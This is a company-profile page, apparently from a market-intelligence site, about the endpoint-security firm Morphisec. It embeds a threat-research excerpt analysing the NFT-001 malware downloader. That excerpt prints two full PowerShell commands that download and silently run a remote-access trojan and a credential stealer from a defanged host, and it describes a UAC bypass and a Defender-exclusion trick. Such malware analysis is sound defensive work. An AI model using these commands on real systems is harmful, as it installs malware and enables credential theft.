Search company, investor...
Morphisec company logo


Founded Year



Series C | Alive

Total Raised


Last Raised

$31M | 2 yrs ago

Mosaic Score
The Mosaic Score is an algorithm that measures the overall financial health and market potential of private companies.

+20 points in the past 30 days

About Morphisec

Morphisec provides an Endpoint Threat Prevention product, delivering protection against the most advanced cyberattacks. The company's patented Moving Target Defense technology prevents threats such as APTs, zero-days, ransomware, evasive fileless attacks and web-borne exploits.

Headquarters Location

11 Beacon St Suite 735

Boston, Massachusetts, 02108,

United States


Compete with Morphisec?

Ensure that your company and products are accurately represented on our platform.

Morphisec's Products & Differentiators


    Windows Moving Target Defense (MTD) endpoint security solution

Expert Collections containing Morphisec

Expert Collections are analyst-curated lists that highlight the companies you need to know in the most important technology spaces.

Morphisec is included in 3 Expert Collections, including Conference Exhibitors.


Conference Exhibitors

5,302 items



5,097 items


Advanced Manufacturing

3,787 items

Companies focused on the technologies to increase manufacturing productivity, ranging from automation & robotics to AR/VR to factory analytics & AI, plus many more.

Morphisec Patents

Morphisec has filed 1 patent.

The 3 most popular patent topics include:

  • Computer security
  • Computer security exploits
  • Computer network security
patents chart

Application Date

Grant Date


Related Topics




Programming paradigms, Computer security exploits, Computer network security, Injection exploits, Computer security


Application Date


Grant Date



Related Topics

Programming paradigms, Computer security exploits, Computer network security, Injection exploits, Computer security



Latest Morphisec News

NFT-001 Malware Gets New Staged Downloader with Improved Evasion Abilities

Sep 23, 2022

4783  The malware delivery hasn’t changed much. It sends a user a private message enticing them to download a related application supposedly granting the user access to the newest features. Below is an example of the phishing message targeting users of “Dune”—an Ethereum-based crypto data analytics platform. If a user clicks the hyperlink in the message, it directs him to a decoy website that mimics the original. There, the user is prompted to download the malicious “installer” which infects the victim’s machine with the Remcos RAT. For more information on the infrastructure, read Morphisec’s previously mentioned white paper, “ Journey of a Crypto Scammer. ”   The New Staged Downloader   The threat actor keeps the first stage “installers” with a low detection rate. The execution starts by performing a User Account Control (UAC) bypass. It hijacks the default handler for the ms-settings protocol and sets it to execute a Powershell command that adds the C:\ folder to the Windows Defender exclusion list. The code that performs this UAC bypass technique is well documented in the open-source repository . But the attacker employed it extremely poorly—he didn't even bother to remove unnecessary WinAPI calls, such as printing to the console. After excluding the C:\ folder from Windows Defender, the following Powershell commands are de-obfuscated and executed:  1) The first Powershell command downloads and executes a plain Remcos RAT (C2 - 144.91.79[.]86). powershell -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden $ProgressPreference = 'SilentlyContinue'; Invoke-WebRequest http://rwwmefkauiaa[. ]ru/bs8bo90akv.exe -OutFile \"$env:appdata/Microsoft/dllservice.exe\"; Start-Process -Filepath \"$env:appdata/Microsoft/dllservice.exe\"  The C2 used in that Remcos RAT was also seen in the wild in samples using the Babadeda crypter. This bolsters our suspicion it's the same threat actor. 2) The second Powershell command downloads and executes Eternity Stealer which steals sensitive information from a victim’s machine such as:   Browser information like login credentials, history, cookies  VPN and FTP client data  Messaging software data  Password management software data powershell -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden $ProgressPreference = 'SilentlyContinue'; mkdir \"$env:appdata/Microsoft/AddIns\"; Invoke-WebRequest http://rwwmefkauiaa[. ]ru/u84ls.exe -OutFile \"$env:appdata/Microsoft/AddIns/exclusions.exe\"; Start-Process -Filepath \"$env:appdata/Microsoft/AddIns/exclusions.exe\"  We also noticed a variant of this downloader in the Tandem Espionage campaign shares commonalities with this campaign:  There is a similar UAC bypass technique using fodhelper.exe (less evasive implementation) Downloading and executing two malicious executables (Arkei stealer and Eternity stealer)  The Eternity stealer is downloaded by the exact same Powershell command as the second Powershell command from the same URL  Though the URL downloading the Eternity stealer is the same, we think these may be two different threat actors that used the same downloader as a service. Defending Against NFT Malware Like NFT-001  The crypto and NFT communities are on the cutting edge of financial innovation, and they are a lucrative target for attackers. This naturally means there’s more scope for threat actors to exploit gaps in such rapidly evolving technology. This new staged downloader for NFT-001 is more evasive than the earlier version, increasing its ability to sneak past traditional cybersecurity solutions. According to the latest Picus report, defense evasion is now the most popular tactic among malware operators. This tactic is popular because there aren’t many effective tools against defense evasion. One such tool is Morphisec’s revolutionary Moving Target Defense (MTD) technology, which comprehensively prevents defense evasion techniques. Unlike other cybersecurity solutions which focus on detecting known patterns with response playbooks, MTD preemptively blocks attacks on memory and applications and remediates the need for a response. To learn more about Morphisec’s revolutionary Moving Target Defense technology, read the white paper: Zero Trust + Moving Target Defense: The Ultimate Ransomware Strategy . IOCs

Morphisec Web Traffic

Page Views per User (PVPU)
Page Views per Million (PVPM)
Reach per Million (RPM)
CBI Logo

Morphisec Rank

Morphisec Frequently Asked Questions (FAQ)

  • When was Morphisec founded?

    Morphisec was founded in 2014.

  • Where is Morphisec's headquarters?

    Morphisec's headquarters is located at 11 Beacon St, Boston.

  • What is Morphisec's latest funding round?

    Morphisec's latest funding round is Series C.

  • How much did Morphisec raise?

    Morphisec raised a total of $50M.

  • Who are the investors of Morphisec?

    Investors of Morphisec include Jerusalem Venture Partners, DTCP, Orange Digital Ventures, GE Ventures, OurCrowd and 6 more.

  • Who are Morphisec's competitors?

    Competitors of Morphisec include Tanium, Deep Instinct, Microsoft, McAfee, Sysdig and 16 more.

  • What products does Morphisec offer?

    Morphisec's products include Guard and 4 more.

  • Who are Morphisec's customers?

    Customers of Morphisec include Altra Industrial Motion, Citizens Medical Center, Houston Eye Associates and Kentucky Trailer.

Compare Morphisec to Competitors

Automox Logo

Automox provides a cloud-based endpoint management solution designed to completely automate the patching, configuration, and maintenance of Windows, OS X, and Linux endpoints from a single platform. Endpoint management is a massive problem for IT organizations, complicated by different operating systems, software, device types, and geographic locations. Automox's Dynamic Policy Engine allows IT managers to customize and group policies that ensure that every endpoint, regardless of location, meets regulatory and security requirements.

McAfee Logo

McAfee is a security technology company, headquartered in Santa Clara, California, and delivers proactive and proven solutions and services that secure systems and networks.On March 1st, 2022, McAfee was acquired by an investor group led by Advent International at a valuation of $14B.

Deep Instinct Logo
Deep Instinct

Deep Instinct applies a subset of artificial intelligence (AI), known as deep learning, to cybersecurity. The company has built a vast neural network that is trained on hundreds of millions of files. There are no human dependencies related to identifying and preventing cyber attacks. As a result, threats are detected >99% of the time, with a false positive rate <0.1%. The company serves business customers. The company was founded in 2015 and is based in New York, New York.

Tanium Logo

Tanium gives enterprises and government organizations the ability to secure, control, and manage millions of endpoints across the enterprise within seconds. Serving as the “central nervous system” for enterprises, Tanium empowers security and IT operations teams to ask questions about the state of endpoints across the enterprise, retrieve data on their current and historical state, and execute change as necessary. The company was founded in 2007 and is based in Kirkland, Washington.

Cybereason Logo

Cybereason develops software that aims to better track the actions of would-be cyber attackers. The Cybereason automated platform collects subtle clues by learning to discern anomalies and distinguish between the benign and pernicious. This data is then analyzed using Big data algorithms and proprietary knowledge enriched with external intelligence.

Source Defense Logo
Source Defense

Source Defense is a real-time SAAS solution that protects online websites from attacks originating from third-party scripts. It uses a real-time sandbox isolation technology to provide a client-side website security solution focused on preventing malicious activity originating from website supply chain vendors. The company was founded in 2014 and is based in Rosh-Ha’ayin, Israel.

Discover the right solution for your team

The CB Insights tech market intelligence platform analyzes millions of data points on vendors, products, partnerships, and patents to help your team find their next technology solution.

Request a demo

CBI websites generally use certain cookies to enable better interactions with our sites and services. Use of these cookies, which may be stored on your device, permits us to improve and customize your experience. You can read more about your cookie choices at our privacy policy here. By continuing to use this site you are consenting to these choices.